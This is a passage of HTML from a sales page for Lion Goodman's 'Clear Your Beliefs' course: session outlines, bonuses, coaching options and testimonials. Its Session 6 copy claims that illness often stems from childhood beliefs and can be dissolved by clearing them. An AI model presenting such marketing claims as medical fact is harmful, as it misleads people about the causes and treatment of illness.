productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div 